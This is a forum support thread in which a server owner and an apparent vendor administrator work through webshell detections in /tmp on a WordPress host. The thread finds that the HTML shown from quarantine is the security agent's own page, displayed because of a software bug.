Jump to content

Recommended Posts

Posted (edited)

Hi

My Ubuntu 22.04 server (hosting just wordpress sites) is being bombarded with alerts from ESET about Malicious file PHP/Webshell.NHF

Real time scanner is deleting it from /tmp (randomly named phpXXXXXXXX)

Opening 1 of the quarantined files and this is the content

<!doctype html>
<html lang="en" dir="ltr" style="height: 100%">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="theme-color" content="#000000" />
    <!--
      manifest.json provides metadata used when your web app is added to the
      homescreen on Android. See https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/
    -->
    <link rel="manifest" href="/manifest.json" />
    <link rel="shortcut icon" href="/favicon.ico" />
    <!--
      Notice the use of %PUBLIC_URL% in the tags above.
      It will be replaced with the URL of the `public` folder during the build.
      Only files inside the `public` folder can be referenced from the HTML.

      Unlike "/favicon.ico" or "favicon.ico", "%PUBLIC_URL%/favicon.ico" will
      work correctly both with client-side routing and a non-root public URL.
      Learn how to configure a non-root public URL by running `npm run build`.
    -->
    <title></title>
    <_script type="module" crossorigin src="/assets/index-jXnLowXT.js"></script>
    <link rel="modulepreload" crossorigin href="/assets/vendor-Dml4Jn7E.js">
    <link rel="modulepreload" crossorigin href="/assets/zui-BB4IjATp.js">
    <link rel="stylesheet" crossorigin href="/assets/vendor-DaeRQUQV.css">
    <link rel="stylesheet" crossorigin href="/assets/index-5V94rzNu.css">
  </head>
  <body style="font-family: 'Segoe UI', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 12px; height: 100%">
    <noscript> You need to enable JavaScript to run this app. </noscript>
    <div id="root" style="height: 100%"></div>
    <div id="modal-root"></div>

  </body>
</html>

 

File Hash B170A6242D5211F9333CA093DE2FB4E05A9003EB

 

Those JS and CSS files appear to belong to ESET

 

xxx@yyy:/$ sudo find / -name vendor-Dml4Jn7E.js
/opt/eset/efs/lib/webd/frontend/assets/vendor-Dml4Jn7E.js
xxx@yyy:/$ sudo find / -name index-jXnLowXT.js
/opt/eset/efs/lib/webd/frontend/assets/index-jXnLowXT.js
xxx@yyy:/$ sudo find / -name zui-BB4IjATp.js
/opt/eset/efs/lib/webd/frontend/assets/zui-BB4IjATp.js
find: ‘/proc/542786’: No such file or directory
find: ‘/proc/542787’: No such file or directory
xxx@yyy:/$ sudo find / -name vendor-DaeRQUQV.css
/opt/eset/efs/lib/webd/frontend/assets/vendor-DaeRQUQV.css
xxx@yyy:/$ sudo find / -name index-5V94rzNu.css
/opt/eset/efs/lib/webd/frontend/assets/index-5V94rzNu.css

 

Server and all wordpress sites are pully patched an up to date

Am i infected with something or has EFS just gone loopy?

Edited by FTL
  • Administrators
Posted

The detection seems to be correct. Even the title is encrypted, after decryption it reads "WAF BYPASS UPLOADER".

Posted

What title is this please Marcos?

The file it says it quarantines has the hash B170A6242D5211F9333CA093DE2FB4E05A9003EB

Howvever the file that i download from quarantine is the code above and ESET doesnt find that file as malicious when it sits on my laptop and open in Notepad?

  • Administrators
Posted

It looks like as follows. Commences with the GIF header to fool AV scanners:

image.png

Posted

Where did you find that data from? The file hash?

Im a little lost :(

  • Administrators
Posted

It's the content of the file that was detected by ESET and quarantined.

Posted

What then is the content of the file in my code tags in OP that is downloaded from quarantine and opened in Notepad?

  • Administrators
Posted

I have no clue but the file with the hash you provided contains the code I posted above.

Posted (edited)

I dont understand whats happening then Marcos.

Here is the output of the Linux Security Agent Running

When i download any of them from the quarantine on the agent this is what gets downloaded (i have changed it to .txt so its an allowed file type to upload)

When i run that file from quarantine through virus total it comes up with hash 0623212b33901c71cc0b1b0e0e55ffe4059b8767 and doesnt get detected by ENdpoint Security running on my laptop

Is there some logs I can pull that will show historically whats gone on?

 

 

 

agent detections.png

phpuzJRMG.txt

Edited by FTL
  • Administrators
Posted

Perhaps a clean file with the same name but a different hash was created after the malicious one was detected and cleaned.

  • Administrators
Posted

You seem to have PHP 8.2 installed, the latest version is 8.3.10. Please consider upgrading it.

Also post a screenshot where the content of the Circumstances column is visible completely.

Posted

agentcircumstances.thumb.png.bd3363e7b691b64f0a1bedc79e5c63b1.png

inspect.png

Posted

i do already have php 8.3.10 installed, all the sites are currently running php-fpm socket 8.2 though as they are all currently compatable with 8.2

I will try changing them to 8.3 and hope none of them break

Server just runs 9 wordpress sites thats it in a LEMP stack

Posted

Ok i have flicked all sites over to php-fpm 8.3.10 socket

Hadnt realised but the older php8.0-fpm was still running and active

Have disbaled 8.0 and 8.2 from starting at boot.

Will monitor over next few hours for any new shell creations

Posted

No joy @Marcos still getting them.

Wordpress and all plugins on all sites updated

Ubuntu 22.04 all updated

I am now shutting websites down 1 by 1 to see which one has whatever vulnerability is casuing this.

 

Also that HTML contect in the files that are being downloaded from quarantine that isnt the original content must be something ESET has changed with EFS for Linux, as there are previous detections in Quarantine from back earlier this year due to a vulnerable plugin that i know 100% i downloaded and opened and saw the original content has now been replaced with the same HTML content as in the OP.

Posted

@Marcos - the html message in the OP thats in the file in quarantine on the Linux FS Agent is the same message for any infection that gets quarantined.

Have just confirmed this by downloading EICAR and opening the quarantined file.

Are you able to advise here on whats changed and why the original content is not going to quarantine anymore?

Or shall i open a support ticket?

Thanks

Posted (edited)

Update: Support have confirmed the issue as a bug - the HTML code being displayed is the agents actual quarantine page html - verfiied by looking at page source.

Its been passed to the devs and am awaiting an update on any potential fixes

Edited by FTL
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...